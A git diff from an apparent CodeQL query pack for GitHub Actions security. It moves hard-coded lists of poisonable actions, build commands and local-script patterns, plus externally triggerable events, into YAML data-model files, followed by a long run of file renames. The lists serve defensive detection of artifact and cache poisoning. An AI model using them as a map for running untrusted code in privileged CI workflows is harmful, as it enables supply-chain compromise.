- * - event: Event name - */ -predicate externallyTriggerableEventsDataModel(string event) { - Extensions::externallyTriggerableEventsDataModel(event) -} - /** * MaD sources * Fields: diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 7217796d138..b09664359ab 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -1,5 +1,6 @@ -private import codeql.actions.dataflow.ExternalFlow private import codeql.actions.security.ArtifactPoisoningQuery +private import codeql.actions.config.Config +private import codeql.actions.dataflow.ExternalFlow /** * A data flow source. diff --git a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll index 05f71cfc0be..bd9d73b4170 100644 --- a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll +++ b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll @@ -22,25 +22,3 @@ extensible predicate actionsSummaryModel( extensible predicate actionsSinkModel( string action, string version, string input, string kind, string provenance ); - -/** - * Holds if workflow data model exists for the given parameters. - */ -extensible predicate workflowDataModel( - string path, string trigger, string job, string secrets_source, string permissions, string runner -); - -/** - * Holds if repository data model exists for the given parameters. - */ -extensible predicate repositoryDataModel(string visibility, string default_branch_name); - -/** - * Holds if a context expression starting with context_prefix is available for a given trigger. - */ -extensible predicate contextTriggerDataModel(string trigger, string context_prefix); - -/** - * Holds if a given trigger event can be fired by an external actor. - */ -extensible predicate externallyTriggerableEventsDataModel(string event); diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index 44c3c64a5a6..d2853591d61 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -254,8 +254,8 @@ class ArtifactPoisoningSink extends DataFlow::Node { poisonable.(UsesStep) = this.asExpr() ) and ( - not poisonable instanceof LocalCommandExecutionRunStep or - poisonable.(LocalCommandExecutionRunStep).getCommand().matches(download.getPath() + "%") + not poisonable instanceof LocalScriptExecutionRunStep or + poisonable.(LocalScriptExecutionRunStep).getCommand().matches(download.getPath() + "%") ) ) } diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll index e80ea71c958..1a3e7b2b2f7 100644 --- a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll @@ -1,5 +1,5 @@ import actions -import codeql.actions.dataflow.ExternalFlow +import codeql.actions.config.Config string defaultBranchTriggerEvent() { result = diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index b1d5269d44a..d9978b2a423 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -1,67 +1,35 @@ import actions +import codeql.actions.config.Config abstract class PoisonableStep extends Step { } -// source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/rules/untrusted_checkout_exec.rego#L16 private string dangerousActions() { - result = - [ - "pre-commit/action", "oxsecurity/megalinter", "bridgecrewio/checkov-action", - "ruby/setup-ruby", "actions/jekyll-build-pages" - ] + exists(string action | + poisonableActionsDataModel(action) and + result = action + ) } class DangerousActionUsesStep extends PoisonableStep, UsesStep { DangerousActionUsesStep() { this.getCallee() = dangerousActions() } } -// source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/rules/untrusted_checkout_exec.rego#L23 -private string dangerousCommands() { - result = - [ - "npm i(nstall)?(\\b|$)", "npm run ", "yarn ", "npm ci(\\b|$)", "make ", "terraform plan", - "terraform apply", "gomplate ", "pre-commit run", "pre-commit install", "go generate", - "msbuild ", "mvn ", "gradle ", "bundle install", "bundle exec ", "^ant ", "mkdocs build", - "pytest", "pip install -r ", "pip install --requirement", "java -jar ", "poetry install", - "poetry run", "cargo " - ] -} - -class BuildRunStep extends PoisonableStep, Run { - BuildRunStep() { - exists( - this.getScript().splitAt("\n").trim().regexpFind("([^a-z]|^)" + dangerousCommands(), _, _) +class PoisonableCommandStep extends PoisonableStep, Run { + PoisonableCommandStep() { + exists(string regexp | + poisonableCommandsDataModel(regexp) and + exists(this.getScript().splitAt("\n").trim().regexpFind("([^a-z]|^)" + regexp, _, _)) ) } } -bindingset[cmdRegexp] -string wrapLocalCmd(string cmdRegexp) { result = "(^|;\\s*|\\s+)" + cmdRegexp + "(\\s+|;|$)" } - -class LocalCommandExecutionRunStep extends PoisonableStep, Run { +class LocalScriptExecutionRunStep extends PoisonableStep, Run { string cmd; - LocalCommandExecutionRunStep() { - // Heuristic: - exists(string line | line = this.getScript().splitAt("\n").trim() | - // ./xxxx - // TODO: It could also be in the form of `dir/cmd` - cmd = line.regexpCapture(wrapLocalCmd("\\.\\/(.*)"), 2) - or - // sh xxxx - cmd = line.regexpCapture(wrapLocalCmd("(ba|z|fi)?sh\\s+(.*)"), 3) - or - // node xxxx.js - cmd = line.regexpCapture(wrapLocalCmd("node\\s+(.*)(\\.js|\\.ts)"), 2) - or - // python xxxx.py - cmd = line.regexpCapture(wrapLocalCmd("python\\s+(.*)\\.py"), 2) - or - // ruby xxxx.rb - cmd = line.regexpCapture(wrapLocalCmd("ruby\\s+(.*)\\.rb"), 2) - or - // go xxxx.go - cmd = line.regexpCapture(wrapLocalCmd("go\\s+(.*)\\.go"), 2) + LocalScriptExecutionRunStep() { + exists(string line, string regexp, int group | line = this.getScript().splitAt("\n").trim() | + poisonableLocalScriptsDataModel(regexp, group) and + cmd = line.regexpCapture(regexp, group) ) } diff --git a/ql/lib/codeql/actions/security/SelfHostedQuery.qll b/ql/lib/codeql/actions/security/SelfHostedQuery.qll index 03b6c87405e..419b2ac81a9 100644 --- a/ql/lib/codeql/actions/security/SelfHostedQuery.qll +++ b/ql/lib/codeql/actions/security/SelfHostedQuery.qll @@ -1,5 +1,5 @@ import actions -import codeql.actions.dataflow.ExternalFlow +import codeql.actions.config.Config bindingset[runner] predicate isGithubHostedRunner(string runner) { diff --git a/ql/lib/ext/workflow-models/workflow-models.yml b/ql/lib/ext/config/context_event_map.yml similarity index 78% rename from ql/lib/ext/workflow-models/workflow-models.yml rename to ql/lib/ext/config/context_event_map.yml index 1f0401e8e61..e09dab14f2b 100644 --- a/ql/lib/ext/workflow-models/workflow-models.yml +++ b/ql/lib/ext/config/context_event_map.yml @@ -1,12 +1,4 @@ extensions: - - addsTo: - pack: github/actions-all - extensible: repositoryDataModel - data: [] - - addsTo: - pack: github/actions-all - extensible: workflowDataModel - data: [] - addsTo: pack: github/actions-all extensible: contextTriggerDataModel @@ -54,19 +46,4 @@ extensions: - ["workflow_call", "github.event.review"] - ["workflow_call", "github.event.workflow"] - ["workflow_call", "github.event.workflow_run"] - - addsTo: - pack: github/actions-all - extensible: externallyTriggerableEventsDataModel - data: - - ["discussion"] - - ["discussion_comment"] - - ["fork"] - - ["issue_comment"] - - ["issues"] - - ["pull_request"] - - ["pull_request_comment"] - - ["pull_request_review"] - - ["pull_request_review_comment"] - - ["pull_request_target"] - - ["workflow_run"] # depending on trigger workflow - - ["workflow_call"] # depending on caller + diff --git a/ql/lib/ext/config/externally_triggereable_events.yml b/ql/lib/ext/config/externally_triggereable_events.yml new file mode 100644 index 00000000000..88d17c728b7 --- /dev/null +++ b/ql/lib/ext/config/externally_triggereable_events.yml @@ -0,0 +1,18 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: externallyTriggerableEventsDataModel + data: + - ["discussion"] + - ["discussion_comment"] + - ["fork"] + - ["issue_comment"] + - ["issues"] + - ["pull_request"] + - ["pull_request_comment"] + - ["pull_request_review"] + - ["pull_request_review_comment"] + - ["pull_request_target"] + - ["workflow_run"] # depending on trigger workflow + - ["workflow_call"] # depending on caller + diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml new file mode 100644 index 00000000000..9a9af08872c --- /dev/null +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -0,0 +1,55 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: poisonableActionsDataModel + # source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/rules/untrusted_checkout_exec.rego#L16 + # source: https://boostsecurityio.github.io/lotp/ + data: + - ["pre-commit/action"] + - ["oxsecurity/megalinter"] + - ["bridgecrewio/checkov-action"] + - ["ruby/setup-ruby"] + - ["actions/jekyll-build-pages"] + - addsTo: + pack: github/actions-all + extensible: poisonableCommandsDataModel + # source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/rules/untrusted_checkout_exec.rego#L23 + # source: https://boostsecurityio.github.io/lotp/ + data: + - ["ant "] + - ["bundle install"] + - ["bundle exec "] + - ["cargo "] + - ["go generate"] + - ["gomplate "] + - ["gradle "] + - ["java -jar "] + - ["make "] + - ["mkdocs build"] + - ["msbuild "] + - ["mvn "] + - ["npm i(nstall)?(\\b|$)"] + - ["npm run "] + - ["npm ci(\\b|$)"] + - ["pip install -r "] + - ["pip install --requirement"] + - ["poetry install"] + - ["poetry run"] + - ["pre-commit run"] + - ["pre-commit install"] + - ["pytest"] + - ["terraform plan"] + - ["terraform apply"] + - ["yarn "] + - addsTo: + pack: github/actions-all + extensible: poisonableLocalScriptsDataModel + data: + # TODO: It could also be in the form of `dir/cmd` + - ["(^|;\\s*|\\s+)(\\.\\/)(.*)(\\s+|;|$)", 3] + - ["(^|;\\s*|\\s+)(source|sh|bash|zsh|fish)\\s+(.*)(\\s+|;|$)", 3] + - ["(^|;\\s*|\\s+)(node)\\s+(.*)(\\.js|\\.ts)(\\s+|;|$)", 3] + - ["(^|;\\s*|\\s+)(python)\\s+(.*)\\.py(\\s+|;|$)", 3] + - ["(^|;\\s*|\\s+)(ruby)\\s+(.*)\\.rb(\\s+|;|$)", 3] + - ["(^|;\\s*|\\s+)(go)\\s+(.*)\\.go(\\s+|;|$)", 3] + diff --git a/ql/lib/ext/config/workflow_runtime_data.yml b/ql/lib/ext/config/workflow_runtime_data.yml new file mode 100644 index 00000000000..88e266d8142 --- /dev/null +++ b/ql/lib/ext/config/workflow_runtime_data.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: repositoryDataModel + data: [] + - addsTo: + pack: github/actions-all + extensible: workflowDataModel + data: [] diff --git a/ql/lib/ext/8398a7_action-slack.model.yml b/ql/lib/ext/manual/8398a7_action-slack.model.yml similarity index 100% rename from ql/lib/ext/8398a7_action-slack.model.yml rename to ql/lib/ext/manual/8398a7_action-slack.model.yml diff --git a/ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml b/ql/lib/ext/manual/SonarSource_sonarcloud-github-action.model.yml similarity index 100% rename from ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml rename to ql/lib/ext/manual/SonarSource_sonarcloud-github-action.model.yml diff --git a/ql/lib/ext/actions_github-script.model.yml b/ql/lib/ext/manual/actions_github-script.model.yml similarity index 100% rename from ql/lib/ext/actions_github-script.model.yml rename to ql/lib/ext/manual/actions_github-script.model.yml diff --git a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml b/ql/lib/ext/manual/ahmadnassri_action-changed-files.model.yml similarity index 100% rename from ql/lib/ext/ahmadnassri_action-changed-files.model.yml rename to ql/lib/ext/manual/ahmadnassri_action-changed-files.model.yml diff --git a/ql/lib/ext/akhileshns_heroku-deploy.model.yml b/ql/lib/ext/manual/akhileshns_heroku-deploy.model.yml similarity index 100% rename from ql/lib/ext/akhileshns_heroku-deploy.model.yml rename to ql/lib/ext/manual/akhileshns_heroku-deploy.model.yml diff --git a/ql/lib/ext/amannn_action-semantic-pull-request.model.yml b/ql/lib/ext/manual/amannn_action-semantic-pull-request.model.yml similarity index 100% rename from ql/lib/ext/amannn_action-semantic-pull-request.model.yml rename to ql/lib/ext/manual/amannn_action-semantic-pull-request.model.yml diff --git a/ql/lib/ext/anchore_sbom-action.model.yml b/ql/lib/ext/manual/anchore_sbom-action.model.yml similarity index 100% rename from ql/lib/ext/anchore_sbom-action.model.yml rename to ql/lib/ext/manual/anchore_sbom-action.model.yml diff --git a/ql/lib/ext/anchore_scan-action.model.yml b/ql/lib/ext/manual/anchore_scan-action.model.yml similarity index 100% rename from ql/lib/ext/anchore_scan-action.model.yml rename to ql/lib/ext/manual/anchore_scan-action.model.yml diff --git a/ql/lib/ext/andresz1_size-limit-action.model.yml b/ql/lib/ext/manual/andresz1_size-limit-action.model.yml similarity index 100% rename from ql/lib/ext/andresz1_size-limit-action.model.yml rename to ql/lib/ext/manual/andresz1_size-limit-action.model.yml diff --git a/ql/lib/ext/android-actions_setup-android.model.yml b/ql/lib/ext/manual/android-actions_setup-android.model.yml similarity index 100% rename from ql/lib/ext/android-actions_setup-android.model.yml rename to ql/lib/ext/manual/android-actions_setup-android.model.yml diff --git a/ql/lib/ext/apple-actions_import-codesign-certs.model.yml b/ql/lib/ext/manual/apple-actions_import-codesign-certs.model.yml similarity index 100% rename from ql/lib/ext/apple-actions_import-codesign-certs.model.yml rename to ql/lib/ext/manual/apple-actions_import-codesign-certs.model.yml diff --git a/ql/lib/ext/asdf-vm_actions.model.yml b/ql/lib/ext/manual/asdf-vm_actions.model.yml similarity index 100% rename from ql/lib/ext/asdf-vm_actions.model.yml rename to ql/lib/ext/manual/asdf-vm_actions.model.yml diff --git a/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml b/ql/lib/ext/manual/ashley-taylor_read-json-property-action.model.yml similarity index 100% rename from ql/lib/ext/ashley-taylor_read-json-property-action.model.yml rename to ql/lib/ext/manual/ashley-taylor_read-json-property-action.model.yml diff --git a/ql/lib/ext/ashley-taylor_regex-property-action.model.yml b/ql/lib/ext/manual/ashley-taylor_regex-property-action.model.yml similarity index 100% rename from ql/lib/ext/ashley-taylor_regex-property-action.model.yml rename to ql/lib/ext/manual/ashley-taylor_regex-property-action.model.yml diff --git a/ql/lib/ext/aszc_change-string-case-action.model.yml b/ql/lib/ext/manual/aszc_change-string-case-action.model.yml similarity index 100% rename from ql/lib/ext/aszc_change-string-case-action.model.yml rename to ql/lib/ext/manual/aszc_change-string-case-action.model.yml diff --git a/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml b/ql/lib/ext/manual/aws-actions_configure-aws-credentials.model.yml similarity index 100% rename from ql/lib/ext/aws-actions_configure-aws-credentials.model.yml rename to ql/lib/ext/manual/aws-actions_configure-aws-credentials.model.yml diff --git a/ql/lib/ext/axel-op_googlejavaformat-action.model.yml b/ql/lib/ext/manual/axel-op_googlejavaformat-action.model.yml similarity index 100% rename from ql/lib/ext/axel-op_googlejavaformat-action.model.yml rename to ql/lib/ext/manual/axel-op_googlejavaformat-action.model.yml diff --git a/ql/lib/ext/azure_powershell.model.yml b/ql/lib/ext/manual/azure_powershell.model.yml similarity index 100% rename from ql/lib/ext/azure_powershell.model.yml rename to ql/lib/ext/manual/azure_powershell.model.yml diff --git a/ql/lib/ext/bahmutov_npm-install.model.yml b/ql/lib/ext/manual/bahmutov_npm-install.model.yml similarity index 100% rename from ql/lib/ext/bahmutov_npm-install.model.yml rename to ql/lib/ext/manual/bahmutov_npm-install.model.yml diff --git a/ql/lib/ext/blackducksoftware_github-action.model.yml b/ql/lib/ext/manual/blackducksoftware_github-action.model.yml similarity index 100% rename from ql/lib/ext/blackducksoftware_github-action.model.yml rename to ql/lib/ext/manual/blackducksoftware_github-action.model.yml diff --git a/ql/lib/ext/bobheadxi_deployments.model.yml b/ql/lib/ext/manual/bobheadxi_deployments.model.yml similarity index 100% rename from ql/lib/ext/bobheadxi_deployments.model.yml rename to ql/lib/ext/manual/bobheadxi_deployments.model.yml diff --git a/ql/lib/ext/bufbuild_buf-breaking-action.model.yml b/ql/lib/ext/manual/bufbuild_buf-breaking-action.model.yml similarity index 100% rename from ql/lib/ext/bufbuild_buf-breaking-action.model.yml rename to ql/lib/ext/manual/bufbuild_buf-breaking-action.model.yml diff --git a/ql/lib/ext/bufbuild_buf-lint-action.model.yml b/ql/lib/ext/manual/bufbuild_buf-lint-action.model.yml similarity index 100% rename from ql/lib/ext/bufbuild_buf-lint-action.model.yml rename to ql/lib/ext/manual/bufbuild_buf-lint-action.model.yml diff --git a/ql/lib/ext/bufbuild_buf-setup-action.model.yml b/ql/lib/ext/manual/bufbuild_buf-setup-action.model.yml similarity index 100% rename from ql/lib/ext/bufbuild_buf-setup-action.model.yml rename to ql/lib/ext/manual/bufbuild_buf-setup-action.model.yml diff --git a/ql/lib/ext/cachix_cachix-action.model.yml b/ql/lib/ext/manual/cachix_cachix-action.model.yml similarity index 100% rename from ql/lib/ext/cachix_cachix-action.model.yml rename to ql/lib/ext/manual/cachix_cachix-action.model.yml diff --git a/ql/lib/ext/changesets_action.model.yml b/ql/lib/ext/manual/changesets_action.model.yml similarity index 100% rename from ql/lib/ext/changesets_action.model.yml rename to ql/lib/ext/manual/changesets_action.model.yml diff --git a/ql/lib/ext/cloudflare_wrangler-action.model.yml b/ql/lib/ext/manual/cloudflare_wrangler-action.model.yml similarity index 100% rename from ql/lib/ext/cloudflare_wrangler-action.model.yml rename to ql/lib/ext/manual/cloudflare_wrangler-action.model.yml diff --git a/ql/lib/ext/coursier_cache-action.model.yml b/ql/lib/ext/manual/coursier_cache-action.model.yml similarity index 100% rename from ql/lib/ext/coursier_cache-action.model.yml rename to ql/lib/ext/manual/coursier_cache-action.model.yml diff --git a/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml b/ql/lib/ext/manual/crazy-max_ghaction-chocolatey.model.yml similarity index 100% rename from ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml rename to ql/lib/ext/manual/crazy-max_ghaction-chocolatey.model.yml diff --git a/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml b/ql/lib/ext/manual/crazy-max_ghaction-import-gpg.model.yml similarity index 100% rename from ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml rename to ql/lib/ext/manual/crazy-max_ghaction-import-gpg.model.yml diff --git a/ql/lib/ext/csexton_release-asset-action.model.yml b/ql/lib/ext/manual/csexton_release-asset-action.model.yml similarity index 100% rename from ql/lib/ext/csexton_release-asset-action.model.yml rename to ql/lib/ext/manual/csexton_release-asset-action.model.yml diff --git a/ql/lib/ext/cycjimmy_semantic-release-action.model.yml b/ql/lib/ext/manual/cycjimmy_semantic-release-action.model.yml similarity index 100% rename from ql/lib/ext/cycjimmy_semantic-release-action.model.yml rename to ql/lib/ext/manual/cycjimmy_semantic-release-action.model.yml diff --git a/ql/lib/ext/cypress-io_github-action.model.yml b/ql/lib/ext/manual/cypress-io_github-action.model.yml similarity index 100% rename from ql/lib/ext/cypress-io_github-action.model.yml rename to ql/lib/ext/manual/cypress-io_github-action.model.yml diff --git a/ql/lib/ext/dailydotdev_action-devcard.model.yml b/ql/lib/ext/manual/dailydotdev_action-devcard.model.yml similarity index 100% rename from ql/lib/ext/dailydotdev_action-devcard.model.yml rename to ql/lib/ext/manual/dailydotdev_action-devcard.model.yml diff --git a/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml b/ql/lib/ext/manual/danielpalme_reportgenerator-github-action.model.yml similarity index 100% rename from ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml rename to ql/lib/ext/manual/danielpalme_reportgenerator-github-action.model.yml diff --git a/ql/lib/ext/daspn_private-actions-checkout.model.yml b/ql/lib/ext/manual/daspn_private-actions-checkout.model.yml similarity index 100% rename from ql/lib/ext/daspn_private-actions-checkout.model.yml rename to ql/lib/ext/manual/daspn_private-actions-checkout.model.yml diff --git a/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml b/ql/lib/ext/manual/dawidd6_action-ansible-playbook.model.yml similarity index 100% rename from ql/lib/ext/dawidd6_action-ansible-playbook.model.yml rename to ql/lib/ext/manual/dawidd6_action-ansible-playbook.model.yml diff --git a/ql/lib/ext/dawidd6_action-download-artifact.model.yml b/ql/lib/ext/manual/dawidd6_action-download-artifact.model.yml similarity index 100% rename from ql/lib/ext/dawidd6_action-download-artifact.model.yml rename to ql/lib/ext/manual/dawidd6_action-download-artifact.model.yml diff --git a/ql/lib/ext/delaguardo_setup-clojure.model.yml b/ql/lib/ext/manual/delaguardo_setup-clojure.model.yml similarity index 100% rename from ql/lib/ext/delaguardo_setup-clojure.model.yml rename to ql/lib/ext/manual/delaguardo_setup-clojure.model.yml diff --git a/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml b/ql/lib/ext/manual/determinatesystems_magic-nix-cache-action.model.yml similarity index 100% rename from ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml rename to ql/lib/ext/manual/determinatesystems_magic-nix-cache-action.model.yml diff --git a/ql/lib/ext/docker-practice_actions-setup-docker.model.yml b/ql/lib/ext/manual/docker-practice_actions-setup-docker.model.yml similarity index 100% rename from ql/lib/ext/docker-practice_actions-setup-docker.model.yml rename to ql/lib/ext/manual/docker-practice_actions-setup-docker.model.yml diff --git a/ql/lib/ext/docker_build-push-action.model.yml b/ql/lib/ext/manual/docker_build-push-action.model.yml similarity index 100% rename from ql/lib/ext/docker_build-push-action.model.yml rename to ql/lib/ext/manual/docker_build-push-action.model.yml diff --git a/ql/lib/ext/endbug_latest-tag.model.yml b/ql/lib/ext/manual/endbug_latest-tag.model.yml similarity index 100% rename from ql/lib/ext/endbug_latest-tag.model.yml rename to ql/lib/ext/manual/endbug_latest-tag.model.yml diff --git a/ql/lib/ext/expo_expo-github-action.model.yml b/ql/lib/ext/manual/expo_expo-github-action.model.yml similarity index 100% rename from ql/lib/ext/expo_expo-github-action.model.yml rename to ql/lib/ext/manual/expo_expo-github-action.model.yml diff --git a/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml b/ql/lib/ext/manual/firebaseextended_action-hosting-deploy.model.yml similarity index 100% rename from ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml rename to ql/lib/ext/manual/firebaseextended_action-hosting-deploy.model.yml diff --git a/ql/lib/ext/frabert_replace-string-action.model.yml b/ql/lib/ext/manual/frabert_replace-string-action.model.yml similarity index 100% rename from ql/lib/ext/frabert_replace-string-action.model.yml rename to ql/lib/ext/manual/frabert_replace-string-action.model.yml diff --git a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml b/ql/lib/ext/manual/franzdiebold_github-env-vars-action.model.yml similarity index 100% rename from ql/lib/ext/franzdiebold_github-env-vars-action.model.yml rename to ql/lib/ext/manual/franzdiebold_github-env-vars-action.model.yml diff --git a/ql/lib/ext/gabrielbb_xvfb-action.model.yml b/ql/lib/ext/manual/gabrielbb_xvfb-action.model.yml similarity index 100% rename from ql/lib/ext/gabrielbb_xvfb-action.model.yml rename to ql/lib/ext/manual/gabrielbb_xvfb-action.model.yml diff --git a/ql/lib/ext/game-ci_unity-builder.model.yml b/ql/lib/ext/manual/game-ci_unity-builder.model.yml similarity index 100% rename from ql/lib/ext/game-ci_unity-builder.model.yml rename to ql/lib/ext/manual/game-ci_unity-builder.model.yml diff --git a/ql/lib/ext/game-ci_unity-test-runner.model.yml b/ql/lib/ext/manual/game-ci_unity-test-runner.model.yml similarity index 100% rename from ql/lib/ext/game-ci_unity-test-runner.model.yml rename to ql/lib/ext/manual/game-ci_unity-test-runner.model.yml diff --git a/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml b/ql/lib/ext/manual/gautamkrishnar_blog-post-workflow.model.yml similarity index 100% rename from ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml rename to ql/lib/ext/manual/gautamkrishnar_blog-post-workflow.model.yml diff --git a/ql/lib/ext/getsentry_action-release.model.yml b/ql/lib/ext/manual/getsentry_action-release.model.yml similarity index 100% rename from ql/lib/ext/getsentry_action-release.model.yml rename to ql/lib/ext/manual/getsentry_action-release.model.yml diff --git a/ql/lib/ext/github_codeql-action.model.yml b/ql/lib/ext/manual/github_codeql-action.model.yml similarity index 100% rename from ql/lib/ext/github_codeql-action.model.yml rename to ql/lib/ext/manual/github_codeql-action.model.yml diff --git a/ql/lib/ext/go-semantic-release_action.model.yml b/ql/lib/ext/manual/go-semantic-release_action.model.yml similarity index 100% rename from ql/lib/ext/go-semantic-release_action.model.yml rename to ql/lib/ext/manual/go-semantic-release_action.model.yml diff --git a/ql/lib/ext/golangci_golangci-lint-action.model.yml b/ql/lib/ext/manual/golangci_golangci-lint-action.model.yml similarity index 100% rename from ql/lib/ext/golangci_golangci-lint-action.model.yml rename to ql/lib/ext/manual/golangci_golangci-lint-action.model.yml diff --git a/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml b/ql/lib/ext/manual/gonuit_heroku-docker-deploy.model.yml similarity index 100% rename from ql/lib/ext/gonuit_heroku-docker-deploy.model.yml rename to ql/lib/ext/manual/gonuit_heroku-docker-deploy.model.yml diff --git a/ql/lib/ext/goreleaser_goreleaser-action.model.yml b/ql/lib/ext/manual/goreleaser_goreleaser-action.model.yml similarity index 100% rename from ql/lib/ext/goreleaser_goreleaser-action.model.yml rename to ql/lib/ext/manual/goreleaser_goreleaser-action.model.yml diff --git a/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml b/ql/lib/ext/manual/gr2m_create-or-update-pull-request-action.model.yml similarity index 100% rename from ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml rename to ql/lib/ext/manual/gr2m_create-or-update-pull-request-action.model.yml diff --git a/ql/lib/ext/gradle_gradle-build-action.model.yml b/ql/lib/ext/manual/gradle_gradle-build-action.model.yml similarity index 100% rename from ql/lib/ext/gradle_gradle-build-action.model.yml rename to ql/lib/ext/manual/gradle_gradle-build-action.model.yml diff --git a/ql/lib/ext/haya14busa_action-cond.model.yml b/ql/lib/ext/manual/haya14busa_action-cond.model.yml similarity index 100% rename from ql/lib/ext/haya14busa_action-cond.model.yml rename to ql/lib/ext/manual/haya14busa_action-cond.model.yml diff --git a/ql/lib/ext/hexlet_project-action.model.yml b/ql/lib/ext/manual/hexlet_project-action.model.yml similarity index 100% rename from ql/lib/ext/hexlet_project-action.model.yml rename to ql/lib/ext/manual/hexlet_project-action.model.yml diff --git a/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml b/ql/lib/ext/manual/ilammy_msvc-dev-cmd.model.yml similarity index 100% rename from ql/lib/ext/ilammy_msvc-dev-cmd.model.yml rename to ql/lib/ext/manual/ilammy_msvc-dev-cmd.model.yml diff --git a/ql/lib/ext/ilammy_setup-nasm.model.yml b/ql/lib/ext/manual/ilammy_setup-nasm.model.yml similarity index 100% rename from ql/lib/ext/ilammy_setup-nasm.model.yml rename to ql/lib/ext/manual/ilammy_setup-nasm.model.yml diff --git a/ql/lib/ext/imjohnbo_issue-bot.model.yml b/ql/lib/ext/manual/imjohnbo_issue-bot.model.yml similarity index 100% rename from ql/lib/ext/imjohnbo_issue-bot.model.yml rename to ql/lib/ext/manual/imjohnbo_issue-bot.model.yml diff --git a/ql/lib/ext/iterative_setup-cml.model.yml b/ql/lib/ext/manual/iterative_setup-cml.model.yml similarity index 100% rename from ql/lib/ext/iterative_setup-cml.model.yml rename to ql/lib/ext/manual/iterative_setup-cml.model.yml diff --git a/ql/lib/ext/iterative_setup-dvc.model.yml b/ql/lib/ext/manual/iterative_setup-dvc.model.yml similarity index 100% rename from ql/lib/ext/iterative_setup-dvc.model.yml rename to ql/lib/ext/manual/iterative_setup-dvc.model.yml diff --git a/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml b/ql/lib/ext/manual/jamesives_github-pages-deploy-action.model.yml similarity index 100% rename from ql/lib/ext/jamesives_github-pages-deploy-action.model.yml rename to ql/lib/ext/manual/jamesives_github-pages-deploy-action.model.yml diff --git a/ql/lib/ext/jitterbit_get-changed-files.model.yml b/ql/lib/ext/manual/jitterbit_get-changed-files.model.yml similarity index 100% rename from ql/lib/ext/jitterbit_get-changed-files.model.yml rename to ql/lib/ext/manual/jitterbit_get-changed-files.model.yml diff --git a/ql/lib/ext/johnnymorganz_stylua-action.model.yml b/ql/lib/ext/manual/johnnymorganz_stylua-action.model.yml similarity index 100% rename from ql/lib/ext/johnnymorganz_stylua-action.model.yml rename to ql/lib/ext/manual/johnnymorganz_stylua-action.model.yml diff --git a/ql/lib/ext/jsdaniell_create-json.model.yml b/ql/lib/ext/manual/jsdaniell_create-json.model.yml similarity index 100% rename from ql/lib/ext/jsdaniell_create-json.model.yml rename to ql/lib/ext/manual/jsdaniell_create-json.model.yml diff --git a/ql/lib/ext/jurplel_install-qt-action.model.yml b/ql/lib/ext/manual/jurplel_install-qt-action.model.yml similarity index 100% rename from ql/lib/ext/jurplel_install-qt-action.model.yml rename to ql/lib/ext/manual/jurplel_install-qt-action.model.yml diff --git a/ql/lib/ext/jwalton_gh-ecr-push.model.yml b/ql/lib/ext/manual/jwalton_gh-ecr-push.model.yml similarity index 100% rename from ql/lib/ext/jwalton_gh-ecr-push.model.yml rename to ql/lib/ext/manual/jwalton_gh-ecr-push.model.yml diff --git a/ql/lib/ext/khan_pull-request-comment-trigger.model.yml b/ql/lib/ext/manual/khan_pull-request-comment-trigger.model.yml similarity index 100% rename from ql/lib/ext/khan_pull-request-comment-trigger.model.yml rename to ql/lib/ext/manual/khan_pull-request-comment-trigger.model.yml diff --git a/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml b/ql/lib/ext/manual/larsoner_circleci-artifacts-redirector-action.model.yml similarity index 100% rename from ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml rename to ql/lib/ext/manual/larsoner_circleci-artifacts-redirector-action.model.yml diff --git 